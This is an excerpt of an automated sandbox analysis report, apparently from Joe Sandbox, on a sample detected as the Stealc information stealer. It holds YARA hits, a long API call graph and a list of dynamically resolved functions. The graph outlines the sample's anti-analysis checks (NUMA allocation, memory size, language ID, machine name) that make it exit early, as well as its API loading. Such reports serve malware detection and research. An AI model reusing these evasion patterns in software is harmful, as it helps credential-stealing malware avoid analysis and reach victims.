                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:9.6%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.7%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
                                  execution_graph 13278 5469f0 13323 532260 13278->13323 13302 546a64 13303 54a9b0 4 API calls 13302->13303 13304 546a6b 13303->13304 13305 54a9b0 4 API calls 13304->13305 13306 546a72 13305->13306 13307 54a9b0 4 API calls 13306->13307 13308 546a79 13307->13308 13309 54a9b0 4 API calls 13308->13309 13310 546a80 13309->13310 13475 54a8a0 13310->13475 13312 546b0c 13479 546920 GetSystemTime 13312->13479 13314 546a89 13314->13312 13316 546ac2 OpenEventA 13314->13316 13318 546af5 CloseHandle Sleep 13316->13318 13319 546ad9 13316->13319 13321 546b0a 13318->13321 13322 546ae1 CreateEventA 13319->13322 13321->13314 13322->13312 13676 5345c0 13323->13676 13325 532274 13326 5345c0 2 API calls 13325->13326 13327 53228d 13326->13327 13328 5345c0 2 API calls 13327->13328 13329 5322a6 13328->13329 13330 5345c0 2 API calls 13329->13330 13331 5322bf 13330->13331 13332 5345c0 2 API calls 13331->13332 13333 5322d8 13332->13333 13334 5345c0 2 API calls 13333->13334 13335 5322f1 13334->13335 13336 5345c0 2 API calls 13335->13336 13337 53230a 13336->13337 13338 5345c0 2 API calls 13337->13338 13339 532323 13338->13339 13340 5345c0 2 API calls 13339->13340 13341 53233c 13340->13341 13342 5345c0 2 API calls 13341->13342 13343 532355 13342->13343 13344 5345c0 2 API calls 13343->13344 13345 53236e 13344->13345 13346 5345c0 2 API calls 13345->13346 13347 532387 13346->13347 13348 5345c0 2 API calls 13347->13348 13349 5323a0 13348->13349 13350 5345c0 2 API calls 13349->13350 13351 5323b9 13350->13351 13352 5345c0 2 API calls 13351->13352 13353 5323d2 13352->13353 13354 5345c0 2 API calls 13353->13354 13355 5323eb 13354->13355 13356 5345c0 2 API calls 13355->13356 13357 532404 13356->13357 13358 5345c0 2 API calls 13357->13358 13359 53241d 13358->13359 13360 5345c0 2 API calls 13359->13360 13361 532436 13360->13361 13362 5345c0 2 API calls 13361->13362 13363 53244f 13362->13363 13364 5345c0 2 API calls 13363->13364 13365 532468 13364->13365 13366 5345c0 2 API 
calls 13365->13366 13367 532481 13366->13367 13368 5345c0 2 API calls 13367->13368 13369 53249a 13368->13369 13370 5345c0 2 API calls 13369->13370 13371 5324b3 13370->13371 13372 5345c0 2 API calls 13371->13372 13373 5324cc 13372->13373 13374 5345c0 2 API calls 13373->13374 13375 5324e5 13374->13375 13376 5345c0 2 API calls 13375->13376 13377 5324fe 13376->13377 13378 5345c0 2 API calls 13377->13378 13379 532517 13378->13379 13380 5345c0 2 API calls 13379->13380 13381 532530 13380->13381 13382 5345c0 2 API calls 13381->13382 13383 532549 13382->13383 13384 5345c0 2 API calls 13383->13384 13385 532562 13384->13385 13386 5345c0 2 API calls 13385->13386 13387 53257b 13386->13387 13388 5345c0 2 API calls 13387->13388 13389 532594 13388->13389 13390 5345c0 2 API calls 13389->13390 13391 5325ad 13390->13391 13392 5345c0 2 API calls 13391->13392 13393 5325c6 13392->13393 13394 5345c0 2 API calls 13393->13394 13395 5325df 13394->13395 13396 5345c0 2 API calls 13395->13396 13397 5325f8 13396->13397 13398 5345c0 2 API calls 13397->13398 13399 532611 13398->13399 13400 5345c0 2 API calls 13399->13400 13401 53262a 13400->13401 13402 5345c0 2 API calls 13401->13402 13403 532643 13402->13403 13404 5345c0 2 API calls 13403->13404 13405 53265c 13404->13405 13406 5345c0 2 API calls 13405->13406 13407 532675 13406->13407 13408 5345c0 2 API calls 13407->13408 13409 53268e 13408->13409 13410 549860 13409->13410 13681 549750 GetPEB 13410->13681 13412 549868 13413 549a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13412->13413 13414 54987a 13412->13414 13415 549af4 GetProcAddress 13413->13415 13416 549b0d 13413->13416 13417 54988c 21 API calls 13414->13417 13415->13416 13418 549b46 13416->13418 13419 549b16 GetProcAddress GetProcAddress 13416->13419 13417->13413 13420 549b4f GetProcAddress 13418->13420 13421 549b68 13418->13421 13419->13418 13420->13421 13422 549b71 GetProcAddress 13421->13422 13423 549b89 13421->13423 13422->13423 13424 546a00 13423->13424 13425 
549b92 GetProcAddress GetProcAddress 13423->13425 13426 54a740 13424->13426 13425->13424 13427 54a750 13426->13427 13428 546a0d 13427->13428 13429 54a77e lstrcpy 13427->13429 13430 5311d0 13428->13430 13429->13428 13431 5311e8 13430->13431 13432 531217 13431->13432 13433 53120f ExitProcess 13431->13433 13434 531160 GetSystemInfo 13432->13434 13435 531184 13434->13435 13436 53117c ExitProcess 13434->13436 13437 531110 GetCurrentProcess VirtualAllocExNuma 13435->13437 13438 531141 ExitProcess 13437->13438 13439 531149 13437->13439 13682 5310a0 VirtualAlloc 13439->13682 13442 531220 13686 5489b0 13442->13686 13445 531249 13446 53129a 13445->13446 13447 531292 ExitProcess 13445->13447 13448 546770 GetUserDefaultLangID 13446->13448 13449 546792 13448->13449 13450 5467d3 13448->13450 13449->13450 13451 5467b7 ExitProcess 13449->13451 13452 5467c1 ExitProcess 13449->13452 13453 5467a3 ExitProcess 13449->13453 13454 5467ad ExitProcess 13449->13454 13455 5467cb ExitProcess 13449->13455 13456 531190 13450->13456 13457 5478e0 3 API calls 13456->13457 13458 53119e 13457->13458 13459 5311cc 13458->13459 13460 547850 3 API calls 13458->13460 13463 547850 GetProcessHeap RtlAllocateHeap GetUserNameA 13459->13463 13461 5311b7 13460->13461 13461->13459 13462 5311c4 ExitProcess 13461->13462 13464 546a30 13463->13464 13465 5478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13464->13465 13466 546a43 13465->13466 13467 54a9b0 13466->13467 13688 54a710 13467->13688 13469 54a9c1 lstrlen 13471 54a9e0 13469->13471 13470 54aa18 13689 54a7a0 13470->13689 13471->13470 13473 54a9fa lstrcpy lstrcat 13471->13473 13473->13470 13474 54aa24 13474->13302 13476 54a8bb 13475->13476 13477 54a90b 13476->13477 13478 54a8f9 lstrcpy 13476->13478 13477->13314 13478->13477 13693 546820 13479->13693 13481 54698e 13482 546998 sscanf 13481->13482 13722 54a800 13482->13722 13484 5469aa SystemTimeToFileTime SystemTimeToFileTime 13485 5469e0 13484->13485 13486 5469ce 13484->13486 13488 545b10 13485->13488 
13486->13485 13487 5469d8 ExitProcess 13486->13487 13489 545b1d 13488->13489 13490 54a740 lstrcpy 13489->13490 13491 545b2e 13490->13491 13724 54a820 lstrlen 13491->13724 13494 54a820 2 API calls 13495 545b64 13494->13495 13496 54a820 2 API calls 13495->13496 13497 545b74 13496->13497 13728 546430 13497->13728 13500 54a820 2 API calls 13501 545b93 13500->13501 13502 54a820 2 API calls 13501->13502 13503 545ba0 13502->13503 13504 54a820 2 API calls 13503->13504 13505 545bad 13504->13505 13506 54a820 2 API calls 13505->13506 13507 545bf9 13506->13507 13737 5326a0 13507->13737 13515 545cc3 13516 546430 lstrcpy 13515->13516 13517 545cd5 13516->13517 13518 54a7a0 lstrcpy 13517->13518 13519 545cf2 13518->13519 13520 54a9b0 4 API calls 13519->13520 13521 545d0a 13520->13521 13522 54a8a0 lstrcpy 13521->13522 13523 545d16 13522->13523 13524 54a9b0 4 API calls 13523->13524 13525 545d3a 13524->13525 13526 54a8a0 lstrcpy 13525->13526 13527 545d46 13526->13527 13528 54a9b0 4 API calls 13527->13528 13529 545d6a 13528->13529 13530 54a8a0 lstrcpy 13529->13530 13531 545d76 13530->13531 13532 54a740 lstrcpy 13531->13532 13533 545d9e 13532->13533 14463 547500 GetWindowsDirectoryA 13533->14463 13536 54a7a0 lstrcpy 13537 545db8 13536->13537 14473 534880 13537->14473 13539 545dbe 14618 5417a0 13539->14618 13541 545dc6 13542 54a740 lstrcpy 13541->13542 13543 545de9 13542->13543 13544 531590 lstrcpy 13543->13544 13545 545dfd 13544->13545 14634 535960 13545->14634 13547 545e03 14778 541050 13547->14778 13549 545e0e 13550 54a740 lstrcpy 13549->13550 13551 545e32 13550->13551 13552 531590 lstrcpy 13551->13552 13553 545e46 13552->13553 13554 535960 34 API calls 13553->13554 13555 545e4c 13554->13555 14782 540d90 13555->14782 13557 545e57 13558 54a740 lstrcpy 13557->13558 13559 545e79 13558->13559 13560 531590 lstrcpy 13559->13560 13561 545e8d 13560->13561 13562 535960 34 API calls 13561->13562 13563 545e93 13562->13563 14789 540f40 13563->14789 13565 545e9e 13566 531590 lstrcpy 13565->13566 
13567 545eb5 13566->13567 14794 541a10 13567->14794 13569 545eba 13570 54a740 lstrcpy 13569->13570 13571 545ed6 13570->13571 15138 534fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13571->15138 13573 545edb 13574 531590 lstrcpy 13573->13574 13575 545f5b 13574->13575 15145 540740 13575->15145 13577 545f60 13578 54a740 lstrcpy 13577->13578 13579 545f86 13578->13579 13580 531590 lstrcpy 13579->13580 13581 545f9a 13580->13581 13582 535960 34 API calls 13581->13582 13583 545fa0 13582->13583 13677 5345d1 RtlAllocateHeap 13676->13677 13680 534621 VirtualProtect 13677->13680 13680->13325 13681->13412 13684 5310c2 codecvt 13682->13684 13683 5310fd 13683->13442 13684->13683 13685 5310e2 VirtualFree 13684->13685 13685->13683 13687 531233 GlobalMemoryStatusEx 13686->13687 13687->13445 13688->13469 13690 54a7c2 13689->13690 13691 54a7ec 13690->13691 13692 54a7da lstrcpy 13690->13692 13691->13474 13692->13691 13694 54a740 lstrcpy 13693->13694 13695 546833 13694->13695 13696 54a9b0 4 API calls 13695->13696 13697 546845 13696->13697 13698 54a8a0 lstrcpy 13697->13698 13699 54684e 13698->13699 13700 54a9b0 4 API calls 13699->13700 13701 546867 13700->13701 13702 54a8a0 lstrcpy 13701->13702 13703 546870 13702->13703 13704 54a9b0 4 API calls 13703->13704 13705 54688a 13704->13705 13706 54a8a0 lstrcpy 13705->13706 13707 546893 13706->13707 13708 54a9b0 4 API calls 13707->13708 13709 5468ac 13708->13709 13710 54a8a0 lstrcpy 13709->13710 13711 5468b5 13710->13711 13712 54a9b0 4 API calls 13711->13712 13713 5468cf 13712->13713 13714 54a8a0 lstrcpy 13713->13714 13715 5468d8 13714->13715 13716 54a9b0 4 API calls 13715->13716 13717 5468f3 13716->13717 13718 54a8a0 lstrcpy 13717->13718 13719 5468fc 13718->13719 13720 54a7a0 lstrcpy 13719->13720 13721 546910 13720->13721 13721->13481 13723 54a812 13722->13723 13723->13484 13725 54a83f 13724->13725 13726 545b54 13725->13726 13727 54a87b lstrcpy 13725->13727 13726->13494 13727->13726 13729 54a8a0 lstrcpy 13728->13729 13730 546443 13729->13730 
13731 54a8a0 lstrcpy 13730->13731 13732 546455 13731->13732 13733 54a8a0 lstrcpy 13732->13733 13734 546467 13733->13734 13735 54a8a0 lstrcpy 13734->13735 13736 545b86 13735->13736 13736->13500 13738 5345c0 2 API calls 13737->13738 13739 5326b4 13738->13739 13740 5345c0 2 API calls 13739->13740 13741 5326d7 13740->13741 13742 5345c0 2 API calls 13741->13742 13743 5326f0 13742->13743 13744 5345c0 2 API calls 13743->13744 13745 532709 13744->13745 13746 5345c0 2 API calls 13745->13746 13747 532736 13746->13747 13748 5345c0 2 API calls 13747->13748 13749 53274f 13748->13749 13750 5345c0 2 API calls 13749->13750 13751 532768 13750->13751 13752 5345c0 2 API calls 13751->13752 13753 532795 13752->13753 13754 5345c0 2 API calls 13753->13754 13755 5327ae 13754->13755 13756 5345c0 2 API calls 13755->13756 13757 5327c7 13756->13757 13758 5345c0 2 API calls 13757->13758 13759 5327e0 13758->13759 13760 5345c0 2 API calls 13759->13760 13761 5327f9 13760->13761 13762 5345c0 2 API calls 13761->13762 13763 532812 13762->13763 13764 5345c0 2 API calls 13763->13764 13765 53282b 13764->13765 13766 5345c0 2 API calls 13765->13766 13767 532844 13766->13767 13768 5345c0 2 API calls 13767->13768 13769 53285d 13768->13769 13770 5345c0 2 API calls 13769->13770 13771 532876 13770->13771 13772 5345c0 2 API calls 13771->13772 13773 53288f 13772->13773 13774 5345c0 2 API calls 13773->13774 13775 5328a8 13774->13775 13776 5345c0 2 API calls 13775->13776 13777 5328c1 13776->13777 13778 5345c0 2 API calls 13777->13778 13779 5328da 13778->13779 13780 5345c0 2 API calls 13779->13780 13781 5328f3 13780->13781 13782 5345c0 2 API calls 13781->13782 13783 53290c 13782->13783 13784 5345c0 2 API calls 13783->13784 13785 532925 13784->13785 13786 5345c0 2 API calls 13785->13786 13787 53293e 13786->13787 13788 5345c0 2 API calls 13787->13788 13789 532957 13788->13789 13790 5345c0 2 API calls 13789->13790 13791 532970 13790->13791 13792 5345c0 2 API calls 13791->13792 13793 532989 13792->13793 13794 5345c0 2 
API calls 13793->13794 13795 5329a2 13794->13795 13796 5345c0 2 API calls 13795->13796 13797 5329bb 13796->13797 13798 5345c0 2 API calls 13797->13798 13799 5329d4 13798->13799 13800 5345c0 2 API calls 13799->13800 13801 5329ed 13800->13801 13802 5345c0 2 API calls 13801->13802 13803 532a06 13802->13803 13804 5345c0 2 API calls 13803->13804 13805 532a1f 13804->13805 13806 5345c0 2 API calls 13805->13806 13807 532a38 13806->13807 13808 5345c0 2 API calls 13807->13808 13809 532a51 13808->13809 13810 5345c0 2 API calls 13809->13810 13811 532a6a 13810->13811 13812 5345c0 2 API calls 13811->13812 13813 532a83 13812->13813 13814 5345c0 2 API calls 13813->13814 13815 532a9c 13814->13815 13816 5345c0 2 API calls 13815->13816 13817 532ab5 13816->13817 13818 5345c0 2 API calls 13817->13818 13819 532ace 13818->13819 13820 5345c0 2 API calls 13819->13820 13821 532ae7 13820->13821 13822 5345c0 2 API calls 13821->13822 13823 532b00 13822->13823 13824 5345c0 2 API calls 13823->13824 13825 532b19 13824->13825 13826 5345c0 2 API calls 13825->13826 13827 532b32 13826->13827 13828 5345c0 2 API calls 13827->13828 13829 532b4b 13828->13829 13830 5345c0 2 API calls 13829->13830 13831 532b64 13830->13831 13832 5345c0 2 API calls 13831->13832 13833 532b7d 13832->13833 13834 5345c0 2 API calls 13833->13834 13835 532b96 13834->13835 13836 5345c0 2 API calls 13835->13836 13837 532baf 13836->13837 13838 5345c0 2 API calls 13837->13838 13839 532bc8 13838->13839 13840 5345c0 2 API calls 13839->13840 13841 532be1 13840->13841 13842 5345c0 2 API calls 13841->13842 13843 532bfa 13842->13843 13844 5345c0 2 API calls 13843->13844 13845 532c13 13844->13845 13846 5345c0 2 API calls 13845->13846 13847 532c2c 13846->13847 13848 5345c0 2 API calls 13847->13848 13849 532c45 13848->13849 13850 5345c0 2 API calls 13849->13850 13851 532c5e 13850->13851 13852 5345c0 2 API calls 13851->13852 13853 532c77 13852->13853 13854 5345c0 2 API calls 13853->13854 13855 532c90 13854->13855 13856 5345c0 2 API calls 
13855->13856 13857 532ca9 13856->13857 13858 5345c0 2 API calls 13857->13858 13859 532cc2 13858->13859 13860 5345c0 2 API calls 13859->13860 13861 532cdb 13860->13861 13862 5345c0 2 API calls 13861->13862 13863 532cf4 13862->13863 13864 5345c0 2 API calls 13863->13864 13865 532d0d 13864->13865 13866 5345c0 2 API calls 13865->13866 13867 532d26 13866->13867 13868 5345c0 2 API calls 13867->13868 13869 532d3f 13868->13869 13870 5345c0 2 API calls 13869->13870 13871 532d58 13870->13871 13872 5345c0 2 API calls 13871->13872 13873 532d71 13872->13873 13874 5345c0 2 API calls 13873->13874 13875 532d8a 13874->13875 13876 5345c0 2 API calls 13875->13876 13877 532da3 13876->13877 13878 5345c0 2 API calls 13877->13878 13879 532dbc 13878->13879 13880 5345c0 2 API calls 13879->13880 13881 532dd5 13880->13881 13882 5345c0 2 API calls 13881->13882 13883 532dee 13882->13883 13884 5345c0 2 API calls 13883->13884 13885 532e07 13884->13885 13886 5345c0 2 API calls 13885->13886 13887 532e20 13886->13887 13888 5345c0 2 API calls 13887->13888 13889 532e39 13888->13889 13890 5345c0 2 API calls 13889->13890 13891 532e52 13890->13891 13892 5345c0 2 API calls 13891->13892 13893 532e6b 13892->13893 13894 5345c0 2 API calls 13893->13894 13895 532e84 13894->13895 13896 5345c0 2 API calls 13895->13896 13897 532e9d 13896->13897 13898 5345c0 2 API calls 13897->13898 13899 532eb6 13898->13899 13900 5345c0 2 API calls 13899->13900 13901 532ecf 13900->13901 13902 5345c0 2 API calls 13901->13902 13903 532ee8 13902->13903 13904 5345c0 2 API calls 13903->13904 13905 532f01 13904->13905 13906 5345c0 2 API calls 13905->13906 13907 532f1a 13906->13907 13908 5345c0 2 API calls 13907->13908 13909 532f33 13908->13909 13910 5345c0 2 API calls 13909->13910 13911 532f4c 13910->13911 13912 5345c0 2 API calls 13911->13912 13913 532f65 13912->13913 13914 5345c0 2 API calls 13913->13914 13915 532f7e 13914->13915 13916 5345c0 2 API calls 13915->13916 13917 532f97 13916->13917 13918 5345c0 2 API calls 13917->13918 
13919 532fb0 13918->13919 13920 5345c0 2 API calls 13919->13920 13921 532fc9 13920->13921 13922 5345c0 2 API calls 13921->13922 13923 532fe2 13922->13923 13924 5345c0 2 API calls 13923->13924 13925 532ffb 13924->13925 13926 5345c0 2 API calls 13925->13926 13927 533014 13926->13927 13928 5345c0 2 API calls 13927->13928 13929 53302d 13928->13929 13930 5345c0 2 API calls 13929->13930 13931 533046 13930->13931 13932 5345c0 2 API calls 13931->13932 13933 53305f 13932->13933 13934 5345c0 2 API calls 13933->13934 13935 533078 13934->13935 13936 5345c0 2 API calls 13935->13936 13937 533091 13936->13937 13938 5345c0 2 API calls 13937->13938 13939 5330aa 13938->13939 13940 5345c0 2 API calls 13939->13940 13941 5330c3 13940->13941 13942 5345c0 2 API calls 13941->13942 13943 5330dc 13942->13943 13944 5345c0 2 API calls 13943->13944 13945 5330f5 13944->13945 13946 5345c0 2 API calls 13945->13946 13947 53310e 13946->13947 13948 5345c0 2 API calls 13947->13948 13949 533127 13948->13949 13950 5345c0 2 API calls 13949->13950 13951 533140 13950->13951 13952 5345c0 2 API calls 13951->13952 13953 533159 13952->13953 13954 5345c0 2 API calls 13953->13954 13955 533172 13954->13955 13956 5345c0 2 API calls 13955->13956 13957 53318b 13956->13957 13958 5345c0 2 API calls 13957->13958 13959 5331a4 13958->13959 13960 5345c0 2 API calls 13959->13960 13961 5331bd 13960->13961 13962 5345c0 2 API calls 13961->13962 13963 5331d6 13962->13963 13964 5345c0 2 API calls 13963->13964 13965 5331ef 13964->13965 13966 5345c0 2 API calls 13965->13966 13967 533208 13966->13967 13968 5345c0 2 API calls 13967->13968 13969 533221 13968->13969 13970 5345c0 2 API calls 13969->13970 13971 53323a 13970->13971 13972 5345c0 2 API calls 13971->13972 13973 533253 13972->13973 13974 5345c0 2 API calls 13973->13974 13975 53326c 13974->13975 13976 5345c0 2 API calls 13975->13976 13977 533285 13976->13977 13978 5345c0 2 API calls 13977->13978 13979 53329e 13978->13979 13980 5345c0 2 API calls 13979->13980 13981 5332b7 
13980->13981 13982 5345c0 2 API calls 13981->13982 13983 5332d0 13982->13983 13984 5345c0 2 API calls 13983->13984 13985 5332e9 13984->13985 13986 5345c0 2 API calls 13985->13986 13987 533302 13986->13987 13988 5345c0 2 API calls 13987->13988 13989 53331b 13988->13989 13990 5345c0 2 API calls 13989->13990 13991 533334 13990->13991 13992 5345c0 2 API calls 13991->13992 13993 53334d 13992->13993 13994 5345c0 2 API calls 13993->13994 13995 533366 13994->13995 13996 5345c0 2 API calls 13995->13996 13997 53337f 13996->13997 13998 5345c0 2 API calls 13997->13998 13999 533398 13998->13999 14000 5345c0 2 API calls 13999->14000 14001 5333b1 14000->14001 14002 5345c0 2 API calls 14001->14002 14003 5333ca 14002->14003 14004 5345c0 2 API calls 14003->14004 14005 5333e3 14004->14005 14006 5345c0 2 API calls 14005->14006 14007 5333fc 14006->14007 14008 5345c0 2 API calls 14007->14008 14009 533415 14008->14009 14010 5345c0 2 API calls 14009->14010 14011 53342e 14010->14011 14012 5345c0 2 API calls 14011->14012 14013 533447 14012->14013 14014 5345c0 2 API calls 14013->14014 14015 533460 14014->14015 14016 5345c0 2 API calls 14015->14016 14017 533479 14016->14017 14018 5345c0 2 API calls 14017->14018 14019 533492 14018->14019 14020 5345c0 2 API calls 14019->14020 14021 5334ab 14020->14021 14022 5345c0 2 API calls 14021->14022 14023 5334c4 14022->14023 14024 5345c0 2 API calls 14023->14024 14025 5334dd 14024->14025 14026 5345c0 2 API calls 14025->14026 14027 5334f6 14026->14027 14028 5345c0 2 API calls 14027->14028 14029 53350f 14028->14029 14030 5345c0 2 API calls 14029->14030 14031 533528 14030->14031 14032 5345c0 2 API calls 14031->14032 14033 533541 14032->14033 14034 5345c0 2 API calls 14033->14034 14035 53355a 14034->14035 14036 5345c0 2 API calls 14035->14036 14037 533573 14036->14037 14038 5345c0 2 API calls 14037->14038 14039 53358c 14038->14039 14040 5345c0 2 API calls 14039->14040 14041 5335a5 14040->14041 14042 5345c0 2 API calls 14041->14042 14043 5335be 14042->14043 
14044 5345c0 2 API calls 14043->14044 14045 5335d7 14044->14045 14046 5345c0 2 API calls 14045->14046 14047 5335f0 14046->14047 14048 5345c0 2 API calls 14047->14048 14049 533609 14048->14049 14050 5345c0 2 API calls 14049->14050 14051 533622 14050->14051 14052 5345c0 2 API calls 14051->14052 14053 53363b 14052->14053 14054 5345c0 2 API calls 14053->14054 14055 533654 14054->14055 14056 5345c0 2 API calls 14055->14056 14057 53366d 14056->14057 14058 5345c0 2 API calls 14057->14058 14059 533686 14058->14059 14060 5345c0 2 API calls 14059->14060 14061 53369f 14060->14061 14062 5345c0 2 API calls 14061->14062 14063 5336b8 14062->14063 14064 5345c0 2 API calls 14063->14064 14065 5336d1 14064->14065 14066 5345c0 2 API calls 14065->14066 14067 5336ea 14066->14067 14068 5345c0 2 API calls 14067->14068 14069 533703 14068->14069 14070 5345c0 2 API calls 14069->14070 14071 53371c 14070->14071 14072 5345c0 2 API calls 14071->14072 14073 533735 14072->14073 14074 5345c0 2 API calls 14073->14074 14075 53374e 14074->14075 14076 5345c0 2 API calls 14075->14076 14077 533767 14076->14077 14078 5345c0 2 API calls 14077->14078 14079 533780 14078->14079 14080 5345c0 2 API calls 14079->14080 14081 533799 14080->14081 14082 5345c0 2 API calls 14081->14082 14083 5337b2 14082->14083 14084 5345c0 2 API calls 14083->14084 14085 5337cb 14084->14085 14086 5345c0 2 API calls 14085->14086 14087 5337e4 14086->14087 14088 5345c0 2 API calls 14087->14088 14089 5337fd 14088->14089 14090 5345c0 2 API calls 14089->14090 14091 533816 14090->14091 14092 5345c0 2 API calls 14091->14092 14093 53382f 14092->14093 14094 5345c0 2 API calls 14093->14094 14095 533848 14094->14095 14096 5345c0 2 API calls 14095->14096 14097 533861 14096->14097 14098 5345c0 2 API calls 14097->14098 14099 53387a 14098->14099 14100 5345c0 2 API calls 14099->14100 14101 533893 14100->14101 14102 5345c0 2 API calls 14101->14102 14103 5338ac 14102->14103 14104 5345c0 2 API calls 14103->14104 14105 5338c5 14104->14105 14106 5345c0 2 
API calls 14105->14106 14107 5338de 14106->14107 14108 5345c0 2 API calls 14107->14108 14109 5338f7 14108->14109 14110 5345c0 2 API calls 14109->14110 14111 533910 14110->14111 14112 5345c0 2 API calls 14111->14112 14113 533929 14112->14113 14114 5345c0 2 API calls 14113->14114 14115 533942 14114->14115 14116 5345c0 2 API calls 14115->14116 14117 53395b 14116->14117 14118 5345c0 2 API calls 14117->14118 14119 533974 14118->14119 14120 5345c0 2 API calls 14119->14120 14121 53398d 14120->14121 14122 5345c0 2 API calls 14121->14122 14123 5339a6 14122->14123 14124 5345c0 2 API calls 14123->14124 14125 5339bf 14124->14125 14126 5345c0 2 API calls 14125->14126 14127 5339d8 14126->14127 14128 5345c0 2 API calls 14127->14128 14129 5339f1 14128->14129 14130 5345c0 2 API calls 14129->14130 14131 533a0a 14130->14131 14132 5345c0 2 API calls 14131->14132 14133 533a23 14132->14133 14134 5345c0 2 API calls 14133->14134 14135 533a3c 14134->14135 14136 5345c0 2 API calls 14135->14136 14137 533a55 14136->14137 14138 5345c0 2 API calls 14137->14138 14139 533a6e 14138->14139 14140 5345c0 2 API calls 14139->14140 14141 533a87 14140->14141 14142 5345c0 2 API calls 14141->14142 14143 533aa0 14142->14143 14144 5345c0 2 API calls 14143->14144 14145 533ab9 14144->14145 14146 5345c0 2 API calls 14145->14146 14147 533ad2 14146->14147 14148 5345c0 2 API calls 14147->14148 14149 533aeb 14148->14149 14150 5345c0 2 API calls 14149->14150 14151 533b04 14150->14151 14152 5345c0 2 API calls 14151->14152 14153 533b1d 14152->14153 14154 5345c0 2 API calls 14153->14154 14155 533b36 14154->14155 14156 5345c0 2 API calls 14155->14156 14157 533b4f 14156->14157 14158 5345c0 2 API calls 14157->14158 14159 533b68 14158->14159 14160 5345c0 2 API calls 14159->14160 14161 533b81 14160->14161 14162 5345c0 2 API calls 14161->14162 14163 533b9a 14162->14163 14164 5345c0 2 API calls 14163->14164 14165 533bb3 14164->14165 14166 5345c0 2 API calls 14165->14166 14167 533bcc 14166->14167 14168 5345c0 2 API calls 
14167->14168 14169 533be5 14168->14169 14170 5345c0 2 API calls 14169->14170 14171 533bfe 14170->14171 14172 5345c0 2 API calls 14171->14172 14173 533c17 14172->14173 14174 5345c0 2 API calls 14173->14174 14175 533c30 14174->14175 14176 5345c0 2 API calls 14175->14176 14177 533c49 14176->14177 14178 5345c0 2 API calls 14177->14178 14179 533c62 14178->14179 14180 5345c0 2 API calls 14179->14180 14181 533c7b 14180->14181 14182 5345c0 2 API calls 14181->14182 14183 533c94 14182->14183 14184 5345c0 2 API calls 14183->14184 14185 533cad 14184->14185 14186 5345c0 2 API calls 14185->14186 14187 533cc6 14186->14187 14188 5345c0 2 API calls 14187->14188 14189 533cdf 14188->14189 14190 5345c0 2 API calls 14189->14190 14191 533cf8 14190->14191 14192 5345c0 2 API calls 14191->14192 14193 533d11 14192->14193 14194 5345c0 2 API calls 14193->14194 14195 533d2a 14194->14195 14196 5345c0 2 API calls 14195->14196 14197 533d43 14196->14197 14198 5345c0 2 API calls 14197->14198 14199 533d5c 14198->14199 14200 5345c0 2 API calls 14199->14200 14201 533d75 14200->14201 14202 5345c0 2 API calls 14201->14202 14203 533d8e 14202->14203 14204 5345c0 2 API calls 14203->14204 14205 533da7 14204->14205 14206 5345c0 2 API calls 14205->14206 14207 533dc0 14206->14207 14208 5345c0 2 API calls 14207->14208 14209 533dd9 14208->14209 14210 5345c0 2 API calls 14209->14210 14211 533df2 14210->14211 14212 5345c0 2 API calls 14211->14212 14213 533e0b 14212->14213 14214 5345c0 2 API calls 14213->14214 14215 533e24 14214->14215 14216 5345c0 2 API calls 14215->14216 14217 533e3d 14216->14217 14218 5345c0 2 API calls 14217->14218 14219 533e56 14218->14219 14220 5345c0 2 API calls 14219->14220 14221 533e6f 14220->14221 14222 5345c0 2 API calls 14221->14222 14223 533e88 14222->14223 14224 5345c0 2 API calls 14223->14224 14225 533ea1 14224->14225 14226 5345c0 2 API calls 14225->14226 14227 533eba 14226->14227 14228 5345c0 2 API calls 14227->14228 14229 533ed3 14228->14229 14230 5345c0 2 API calls 14229->14230 

                                  Control-flow Graph: function 549860-549bc2 (rendered graph not captured)
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011F2398), ref: 005498A1
                                  • GetProcAddress.KERNEL32(74DD0000,011F2338), ref: 005498BA
                                  • GetProcAddress.KERNEL32(74DD0000,011F2248), ref: 005498D2
                                  • GetProcAddress.KERNEL32(74DD0000,011F23C8), ref: 005498EA
                                  • GetProcAddress.KERNEL32(74DD0000,011F2458), ref: 00549903
                                  • GetProcAddress.KERNEL32(74DD0000,011F91E8), ref: 0054991B
                                  • GetProcAddress.KERNEL32(74DD0000,011E5C30), ref: 00549933
                                  • GetProcAddress.KERNEL32(74DD0000,011E5AD0), ref: 0054994C
                                  • GetProcAddress.KERNEL32(74DD0000,011F2470), ref: 00549964
                                  • GetProcAddress.KERNEL32(74DD0000,011F2488), ref: 0054997C
                                  • GetProcAddress.KERNEL32(74DD0000,011F22A8), ref: 00549995
                                  • GetProcAddress.KERNEL32(74DD0000,011F2260), ref: 005499AD
                                  • GetProcAddress.KERNEL32(74DD0000,011E5D10), ref: 005499C5
                                  • GetProcAddress.KERNEL32(74DD0000,011F2278), ref: 005499DE
                                  • GetProcAddress.KERNEL32(74DD0000,011F22C0), ref: 005499F6
                                  • GetProcAddress.KERNEL32(74DD0000,011E5B50), ref: 00549A0E
                                  • GetProcAddress.KERNEL32(74DD0000,011F2350), ref: 00549A27
                                  • GetProcAddress.KERNEL32(74DD0000,011F22D8), ref: 00549A3F
                                  • GetProcAddress.KERNEL32(74DD0000,011E5BB0), ref: 00549A57
                                  • GetProcAddress.KERNEL32(74DD0000,011F2368), ref: 00549A70
                                  • GetProcAddress.KERNEL32(74DD0000,011E5BD0), ref: 00549A88
                                  • LoadLibraryA.KERNEL32(011F25D8,?,00546A00), ref: 00549A9A
                                  • LoadLibraryA.KERNEL32(011F2560,?,00546A00), ref: 00549AAB
                                  • LoadLibraryA.KERNEL32(011F2530,?,00546A00), ref: 00549ABD
                                  • LoadLibraryA.KERNEL32(011F25A8,?,00546A00), ref: 00549ACF
                                  • LoadLibraryA.KERNEL32(011F2578,?,00546A00), ref: 00549AE0
                                  • GetProcAddress.KERNEL32(75A70000,011F2518), ref: 00549B02
